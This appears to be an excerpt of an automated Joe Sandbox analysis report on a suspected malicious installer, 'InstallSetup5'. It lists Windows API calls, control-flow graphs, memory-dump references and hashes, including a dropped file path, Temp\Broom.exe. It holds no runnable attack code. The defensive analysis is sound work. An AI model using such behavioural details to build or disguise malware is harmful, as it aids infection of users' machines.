                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Broom.exe
                                                                                                                                                              • API String ID: 1941528284-733011491
                                                                                                                                                              • Opcode ID: 2e80ac3c5f2a430d828697df6b1c0cc1dc37c10f5fd59b308a4190c5f51c851e
                                                                                                                                                              • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                                                                                              • Opcode Fuzzy Hash: 2e80ac3c5f2a430d828697df6b1c0cc1dc37c10f5fd59b308a4190c5f51c851e
                                                                                                                                                              • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 420 4068db-4068fb GetSystemDirectoryW 421 4068fd 420->421 422 4068ff-406901 420->422 421->422 423 406912-406914 422->423 424 406903-40690c 422->424 426 406915-406948 wsprintfW LoadLibraryExW 423->426 424->423 425 40690e-406910 424->425 425->426
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                              • wsprintfW.USER32 ref: 0040692D
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                              • String ID: %s%S.dll$UXTHEME
                                                                                                                                                              • API String ID: 2200240437-1106614640
                                                                                                                                                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                              • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                              • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 427 406076-406082 428 406083-4060b7 GetTickCount GetTempFileNameW 427->428 429 4060c6-4060c8 428->429 430 4060b9-4060bb 428->430 431 4060c0-4060c3 429->431 430->428 432 4060bd 430->432 432->431
                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00406094
                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                              • API String ID: 1716503409-1857211195
                                                                                                                                                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                              • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                                                                                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                              • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 433 4015c6-4015da call 402dab call 405ed1 438 401636-401639 433->438 439 4015dc-4015ef call 405e53 433->439 441 401668-4022fb call 401423 438->441 442 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 438->442 447 4015f1-4015f4 439->447 448 401609-40160c call 405b05 439->448 456 402c2f-402c3e 441->456 442->456 459 401660-401663 442->459 447->448 453 4015f6-4015fd call 405b22 447->453 457 401611-401613 448->457 453->448 463 4015ff-401607 call 405aab 453->463 460 401615-40161a 457->460 461 40162c-401634 457->461 459->456 464 401629 460->464 465 40161c-401627 GetFileAttributesW 460->465 461->438 461->439 463->457 464->461 465->461 465->464
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                                                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                                                • Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 00401652
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401645
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                              • API String ID: 1892508949-1104044542
                                                                                                                                                              • Opcode ID: 04e0d5993f268d170d316adf500480e0df0f6d42439d873a7858c5bb752ae6a4
                                                                                                                                                              • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                                                                                              • Opcode Fuzzy Hash: 04e0d5993f268d170d316adf500480e0df0f6d42439d873a7858c5bb752ae6a4
                                                                                                                                                              • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 469 401389-40138e 470 4013fa-4013fc 469->470 471 401390-4013a0 470->471 472 4013fe 470->472 471->472 474 4013a2-4013a3 call 401434 471->474 473 401400-401401 472->473 476 4013a8-4013ad 474->476 477 401404-401409 476->477 478 4013af-4013b7 call 40136d 476->478 477->473 481 4013b9-4013bb 478->481 482 4013bd-4013c2 478->482 483 4013c4-4013c9 481->483 482->483 483->470 484 4013cb-4013f4 MulDiv SendMessageW 483->484 484->470
                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                              • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                                                                                              • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                              • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 485 405b3a-405b6b CreateProcessW 486 405b79-405b7a 485->486 487 405b6d-405b76 CloseHandle 485->487 487->486
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                                              • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                                              • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                                                                                              • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                                              • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 488 40694b-406965 GetModuleHandleA 489 406971-40697e GetProcAddress 488->489 490 406967-406968 call 4068db 488->490 491 406982-406984 489->491 493 40696d-40696f 490->493 493->489 494 406980 493->494 494->491
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                • Part of subcall function 004068DB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                              • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                                                                                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                              • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 495 406047-406073 GetFileAttributesW CreateFileW
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 496 406022-406032 GetFileAttributesW 497 406041-406044 496->497 498 406034-40603b SetFileAttributesW 496->498 498->497
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                              • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                                                                                              • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                              • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 499 405b05-405b13 CreateDirectoryW 500 405b15-405b17 499->500 501 405b19 GetLastError 499->501 502 405b1f 500->502 501->502
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID:
